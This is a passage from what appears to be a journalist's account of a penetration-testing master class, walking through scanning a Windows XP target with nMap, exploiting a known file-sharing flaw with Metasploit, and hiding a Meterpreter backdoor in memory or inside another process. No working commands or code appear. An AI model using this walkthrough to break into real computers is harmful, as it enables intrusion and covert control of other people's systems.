The whole thing is so convincing that when the company demonstrated it to a US senator who was visiting their offices, he immediately accused his head of press of being involved, despite having seen the entire process first hand.
2. Finding a way in, with Metasploit
But sometimes you just want to remotely take over a computer. What then?
The first thing to do is look for ways in. There are a number of such discovery tools, from SQLmap, which automatically looks for weaknesses in large databases, to Burpsuite, which is designed to take advantage of web application, but the one we were using was nMap, a type of program known as a port scanner.
Such applications are often likened to walking down the street, trying every door just to check if one is unlocked, but that slightly underestimates the scale of the thing. Services like nMap are more akin to walking through a city trying every door, window, and loose-looking brick while simultaneously making a note of how many locks they have, what type of key they take, and when it looks like they were built.
After just 45 seconds, the scan was done. It had identified our target: a computer running Windows XP Service Pack 2, released in 2004 and superseded by Service Pack 3 in 2008. (It was technically superseded by Windows Vista in 2007, but we don’t talk about Vista anymore.) Such a setup may seem like our poor sap — in reality a virtual machine running on Belton’s laptop — was being stitched up, but decade-old installations are depressingly common in the business world.
A few more keystrokes, and I launched the program which would get me inside: Metasploit.
The jewel in Rapid7’s arsenal, Metasploit is a one-stop-shop for cracking into computers. The program itself is over a decade old, but has been steadily updated with new vulnerabilities as time has gone on. It’s never at the cutting-edge, where security researchers are finding new holes, but what it lacks in currency it makes up for in ease-of-use.
Like all software for penetration testers, Metasploit has a strong contingent of users who are more interested in just seeing what they can break into. ‘’Let’s be honest, that’s what everyone uses it for,’’ says a Rapid7 PR sitting in on the master class.
With the help of Belton, I picked the particular faulty door which I would make my way through. According to nMap, our target was running a Microsoft program which comes installed on all XP computers and lets them share files back and forth. But version three of the software, which the target had, has a known vulnerability (‘’a parsing flaw in the path canonicalization code of NetAPI32.dll,’’ according to Rapid7). Using Metasploit, a single-line command exploits that flaw to load the third and final part of our assault, Meterpreter.
3. Taking control with Meterpreter
Running on the target computer, Meterpreter provides a backdoor through which I can take control of pretty much anything. The program never installs itself, running only in the memory, and only a particularly paranoid target will notice that their task monitor now shows a randomly named process. If even that’s too much risk, one further command can “inject’” Meterpreter inside another program so it stays invisible.